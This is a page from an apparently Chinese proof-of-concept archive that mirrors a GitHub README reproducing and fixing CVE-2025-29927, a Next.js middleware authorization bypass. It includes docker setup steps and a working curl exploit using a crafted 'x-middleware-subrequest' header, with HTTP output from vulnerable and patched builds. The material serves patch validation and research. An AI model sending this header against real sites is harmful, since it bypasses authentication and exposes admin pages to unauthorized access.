支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:640

64.0%
立即捐款

POC详情: 4924ef3ceb64230136277a76086f90f6c194e544

来源
https://github.com/Bongni/CVE-2025-29927
关联漏洞
标题:Next.js 安全漏洞 (CVE-2025-29927)
描述:Next.js是Vercel开源的一个 React 框架。 Next.js 14.2.25之前版本和15.2.3之前版本存在安全漏洞,该漏洞源于如果授权检查发生在中间件中,可能绕过授权检查。
描述
Reproduction and fix of the CVE-2025-29927 vulnerability.
介绍
# CVE-2025-29927

Reproduction and fix of the CVE-2025-29927 vulnerability.

```
git clone git@github.com:Bongni/CVE-2025-29927.git
cd CVE-2025-29927
```

In `vulnerable/` there is a version of the application that is vulnerable to the attack. In `fixed/` there is a version of the application that is upgraded to the minimal version that fixes the vulnerability.

> ⚠️ Important: These examples are provided for defenders, researchers, and teams validating patching. Do **not** run these images on public or production networks. Only test on systems you own or where you have explicit written permission.

## Vulnerable version

Reproduction of the CVE-2025-29927 vulnerability.

### Build and start the docker container

```
cd vulnerable/
docker build -t next-app-vuln .
docker run -p 3000:3000 next-app-vuln
```

### Run the exploit

Run this command, which should get redirected to the login page

```
curl -i http://localhost:3000/admin
```

```
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
```

Then run this command, which should be able to access the admin page

```
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
```

```
HTTP/1.1 200 OK
X-Powered-By: Next.js
ETag: "nr3m78x84avh"
Content-Type: text/html; charset=utf-8
Content-Length: 1133
Vary: Accept-Encoding
Date: Wed, 08 Oct 2025 22:54:39 GMT
Connection: keep-alive
Keep-Alive: timeout=5

...
```

## Fixed version

Fix of the CVE-2025-29927 vulnerability.

### Build and start the docker container

```
cd fixed/
docker build -t next-app-fixed .
docker run -p 3000:3000 next-app-fixed
```

### Run the exploit

Run this command, which should get redirected to the login page

```
curl -i http://localhost:3000/admin
```

```
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
```

Then run this command, which should now also be redirected to the login page

```
curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
```

```
HTTP/1.1 307 Temporary Redirect
location: /login
Date: Wed, 08 Oct 2025 03:37:24 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
```

## References

This repository is based on [l1uk/nextjs-middleware-exploit](https://github.com/l1uk/nextjs-middleware-exploit), but adapted for version 15.x of Next.js.
文件快照

 [4.0K]  /data/pocs/4924ef3ceb64230136277a76086f90f6c194e544
├── [4.0K]  fixed
│   ├── [ 133]  Dockerfile
│   ├── [ 523]  middleware.js
│   ├── [ 281]  package.json
│   ├── [4.0K]  pages
│   │   ├── [  63]  admin.js
│   │   └── [  63]  login.js
│   └── [ 849]  README.md
├── [1.0K]  LICENSE
├── [2.5K]  README.md
└── [4.0K]  vulnerable
    ├── [ 133]  Dockerfile
    ├── [ 523]  middleware.js
    ├── [ 280]  package.json
    ├── [4.0K]  pages
    │   ├── [  63]  admin.js
    │   └── [  63]  login.js
    └── [ 923]  README.md

5 directories, 14 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。